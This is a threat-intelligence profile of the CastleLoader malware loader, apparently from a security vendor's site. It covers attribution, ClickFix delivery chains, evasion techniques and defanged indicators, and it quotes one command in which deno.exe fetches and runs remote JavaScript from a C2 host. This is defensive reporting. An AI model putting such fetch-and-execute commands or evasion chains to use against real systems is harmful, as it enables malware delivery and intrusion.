CastleLoader
CastleLoader is a modular malware loader and malware-as-a-service (MaaS) framework active since at least early 2025 and associated primarily with the threat actor TAG-150, later tracked as GrayBravo. It is used as an initial infection vector to deliver a wide range of secondary payloads, including LummaC2, NetSupport RAT, StealC, RedLine Stealer, Rhadamanthys, DeerStealer, SectopRAT, WarmCookie, HijackLoader, DOILoader, MonsterV2/Aurotun Stealer, and CastleStealer. Reporting also notes links to MuddyWater through shared code-signing certificates, and FakeSet has been observed delivering CastleLoader in recent infections.
Observed delivery methods include ClickFix-style social engineering, fake CAPTCHA and Cloudflare-themed lures, bogus GitHub repositories, malicious installers, and multi-stage chains using Deno or embedded Python runtimes. In one documented chain, CastleLoader was delivered through Inno Setup -> AutoIt -> process hollowing; in others, attackers abused LOLBins such as finger.exe, curl.exe, tar.exe, cmd.exe, and explorer.exe, or used NSIS installers with embedded Python to decrypt and execute CastleLoader shellcode in memory. Campaigns have impersonated free image-editing or background-removal tools, LinkedIn, Indeed, software libraries, browser updates, and document verification systems.
CastleLoader is designed for flexible malware deployment and in-memory task execution. Reported capabilities include host profiling and fingerprinting, collection of username, computer name, domain name, Windows version, architecture, and installed antivirus products, anti-VM and geofencing checks, run-as-admin behavior, screenshot support, fake error display, and prevention of restart. It uses multiple evasion and execution techniques across reports, including heavy obfuscation, API hashing, XOR-encrypted strings, RC4-encrypted payload retrieval, reflective PE loading, direct ntdll system-call usage, process hollowing, ReplaceTextW callback execution, and in-memory shellcode execution. C2 traffic has been described as using RC4 and ChaCha20/ChaCha encryption, with custom serialized tasking containers.
CastleLoader infrastructure has been documented on domains including maybedontbanplease[.]com and trindastal[.]com, with one report identifying maybedontbanplease[.]com as GrayBravo-operated C2 registered on 2026-04-02 and resolving to 38[.]180[.]136[.]139. Other reported infrastructure details include C2 servers commonly exposing functionality on port 80 and admin panels on port 5050, sometimes 9999. Specific indicators mentioned in reporting include the C2 domain maybedontbanplease[.]com, the domain trindastal[.]com, the User-Agent string GoogeBot, the CastleLoader core hash bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92, and the NSIS sample hash 4ba0d3ae41a0ae3143e8c2c3307c24b0d548593f97c79a30c0387b3d62504c31.
Targeting described in the content includes government entities, U.S. government agencies, critical infrastructure, IT firms, logistics companies, and multiple other industries. CastleLoader has been characterized as a stealthy first-stage loader used in attacks against government entities and multiple industries, and multiple activity clusters have been observed leveraging it, reinforcing assessment that it is offered under a MaaS model.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
CastleStealer is a .NET information stealer that was recently distributed alongside CastleLoader through a ClickFix-style lure masquerading as a free image-editing tool as part of a campaign codenamed BackgroundFix.
Another malware family linked to MuddyWater is a downloader called FakeSet, which the security researchers say was used in recent infections to deliver CastleLoader. CastleLoader is sold as a service to multiple affiliates and cyber crews.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
7 techniques
Execution
Victims are tricked into copying and executing malicious PowerShell commands on their own devices, thereby enabling the compromise.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Lastly, the renamed Python interpreter will be used to execute inline Python code.
The following stage is executed with the downloaded Deno executable: ... deno.exe run -A http://{C2}/{random_path}.js
In this case, the bytecode file is another in-memory loader that uses the Windows ctypes interface to execute shellcode received from a local named pipe.
Persistence
1 technique
Persistence
Privilege Escalation
4 techniques
Privilege Escalation
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Stealth
9 techniques
Stealth
The payload downloaded by the renamed Python interpreter is another Python script that performs a Cyrillic substitution operation. Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents.
Infections are most commonly initiated through Cloudflare-themed “ClickFix” phishing attacks or fraudulent GitHub repositories masquerading as legitimate applications. The operators employ the ClickFix technique by leveraging domains that imitate software development libraries, online meeting platforms, browser update alerts, and document verification systems.
This directory is also created under %LocalAppData% and mimics a legitimate Python installation structure, depending on the runtime variant being used (embedded CPython or IronPython).
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Embedded JavaScript dynamically fetches remote content from this endpoint, applies ROT13 to decode the response... Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents... using Base64 encoding, XOR decryption... The first 64 bytes of the downloaded blob are treated as the RC4 key... all C2 communication is encrypted via the symmetric ChaCha algorithm.
Despite differences in tooling and runtime selection, both variants follow the same overall execution chain, including LOLBin abuse, portable Python runtime deployment, staged payload retrieval, and in-memory execution of the next-stage malware payload.
Credential Access
1 technique
Credential Access
Discovery
3 techniques
Discovery
The loader issues a get_tasks request to its C2 server using generated identifiers of the infected host... along with system profiling data (username, computer_name, domain_name, windows_version, arch, active_av and active_list).
Collection
2 techniques
Collection
Command and Control
4 techniques
Command and Control
The infrastructure linked to TAG-150 includes both victim-facing Tier 1 components, such as IP addresses and domains used as command-and-control (C2) servers for multiple malware families...
For the initial configuration fetch, the malware issues a GET request to a hardcoded base URL... the loader contacts only the base endpoint and transmits encrypted data within the HTTP POST request body.
IOCs tracked for this family
117 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
43 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Loader observed distributing CastleStealer alongside ClickFix-style lures; attributed in the article to the GrayBravo threat activity cluster.
A fileless Malware-as-a-Service loader used in the ClickFix campaign to retrieve configuration, communicate with C2 using ChaCha20 and RC4-based mechanisms, execute tasks, and deliver next-stage payloads including a Python-based RAT.
A malware loader delivered through a Deno-based multi-stage infection chain using the ClickFix lure.
A malware loader observed being delivered through a Deno-based multi-stage infection chain involving the ClickFix lure.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.